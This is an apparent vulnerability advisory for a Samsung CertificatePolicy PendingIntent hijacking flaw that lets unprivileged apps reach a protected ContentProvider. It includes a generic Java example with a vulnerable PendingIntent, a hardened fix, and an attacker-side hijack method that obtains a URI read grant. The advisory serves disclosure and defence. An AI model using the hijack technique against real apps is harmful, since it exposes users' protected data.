Samsung PendingIntent Hijacking Vulnerability in CertificatePolicy Allowing Unauthorized Access to ContentProvider

Vulnerability

A PendingIntent hijacking vulnerability has been identified in the CertificatePolicy component of Samsung's Android framework, affecting devices running software prior to the April 2023 Security Maintenance Release (SMR). In PendingIntent hijacking generally, a privileged component hands out a PendingIntent that an unprivileged app can obtain; because that PendingIntent carries the creator's identity and permissions, and its underlying Intent leaves fields unspecified or modifiable, the recipient can complete the Intent and have it delivered as if the privileged component had sent it. Here, improper handling of PendingIntents in CertificatePolicy lets a local attacker reach a ContentProvider without holding the permissions that normally gate access to it, bypassing the intended authorization and exposing the provider's data or functionality.
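The following is an added example and is not Samsung's code or anything derived from the affected CertificatePolicy component. It shows the general PendingIntent hijacking pattern the advisory describes: a privileged app creates a mutable PendingIntent from an empty Intent, an unprivileged app that obtains it fills in the empty fields so the Intent resolves to the attacker's own activity with a URI grant for the victim's ContentProvider, and the hardened form that closes the hole. All package names, class names, the action string and the content URI are hypothetical placeholders.

```java
// Added example (not Samsung's code): the general PendingIntent hijacking pattern
// and its hardened counterpart. Package names, class names, the action string and
// the content URI are hypothetical.
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Build;

public final class PendingIntentHijackDemo {

    // --- Privileged app (victim side) ---

    // VULNERABLE: the base Intent has no component, action, data or package, and the
    // PendingIntent is mutable. Whoever receives it can call PendingIntent.send() with a
    // fill-in Intent; Intent.fillIn() populates the empty fields, and the result is
    // delivered with the creator's identity and permissions.
    static PendingIntent vulnerablePendingIntent(Context ctx) {
        Intent base = new Intent();
        int flags = PendingIntent.FLAG_UPDATE_CURRENT;
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.S) {
            flags |= PendingIntent.FLAG_MUTABLE; // Android 12+ requires mutability to be explicit
        }
        return PendingIntent.getActivity(ctx, 0, base, flags);
    }

    // HARDENED: explicit component so the target cannot be redirected, package pinned,
    // and FLAG_IMMUTABLE so fill-in Intents are ignored entirely. No Intent.FILL_IN_*
    // flags are passed to getActivity(), so the component could not be overridden even
    // if the PendingIntent were mutable.
    static PendingIntent hardenedPendingIntent(Context ctx) {
        Intent base = new Intent()
                .setClassName(ctx, "com.victim.app.InternalActivity") // hypothetical activity
                .setPackage(ctx.getPackageName());
        return PendingIntent.getActivity(ctx, 0, base,
                PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
    }

    // Build-time sanity check a privileged app can apply before handing a PendingIntent
    // to another process: the base Intent must be explicit, the PendingIntent immutable,
    // and no FILL_IN_* bits may have been requested at creation.
    static boolean isLockedDown(Intent base, int pendingIntentFlags) {
        int fillInMask = Intent.FILL_IN_ACTION | Intent.FILL_IN_DATA | Intent.FILL_IN_CATEGORIES
                | Intent.FILL_IN_COMPONENT | Intent.FILL_IN_PACKAGE | Intent.FILL_IN_SELECTOR
                | Intent.FILL_IN_CLIP_DATA;
        return base.getComponent() != null
                && (pendingIntentFlags & PendingIntent.FLAG_IMMUTABLE) != 0
                && (pendingIntentFlags & fillInMask) == 0;
    }

    // --- Unprivileged app (attacker side) that has obtained the vulnerable PendingIntent ---

    // Fill the empty fields so the Intent resolves to the attacker's own activity (matched
    // by the hypothetical action and pinned to the attacker's package), names a content
    // URI owned by the victim, and asks for a read grant. Because send() executes as the
    // creator, the URI grant is issued from the creator's permissions, and the attacker's
    // activity receives access to the provider that it could never obtain directly.
    static void hijack(Context attackerCtx, PendingIntent leaked)
            throws PendingIntent.CanceledException {
        Intent fillIn = new Intent("com.attacker.HIJACK")                      // hypothetical action
                .setPackage("com.attacker.app")                                 // hypothetical package
                .setData(Uri.parse("content://com.victim.provider/secrets"))    // hypothetical provider
                .addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
        // Intent.fillIn() copies action, data, package and categories only where the base
        // Intent left them unset, ORs in the flags, and copies the component only if
        // FILL_IN_COMPONENT was requested when the PendingIntent was created.
        leaked.send(attackerCtx, 0, fillIn);
    }
}
```

The attacker side needs nothing more than an activity in its own manifest with an intent-filter for the hypothetical action and a `content` data scheme; once `send()` runs, that activity is launched with a URI permission grant and can query the provider. Against `hardenedPendingIntent()` the same call has no effect: the Intent is already fully specified and `FLAG_IMMUTABLE` makes the fill-in Intent irrelevant.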

Impact

Exploitation of this vulnerability gives an unprivileged local app access to a ContentProvider it is not authorized to use, allowing it to read or modify the data exposed there without holding the permissions that guard it.

Remediation

Samsung fixed this vulnerability in the April 2023 Security Maintenance Release; users should update to that release. Download instructions are available on the Samsung Mobile Security Update page.

Added: Sep 3, 2025, 6:30 AM
Updated: Sep 3, 2025, 6:30 AM

Vulnerability Rating

Custom Algorithm

spread          9.0
impact          2.5
exploitability  3.3
remediation     7.7
relevance       0.5
threat          0.0
urgency         2.9
incentive       0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.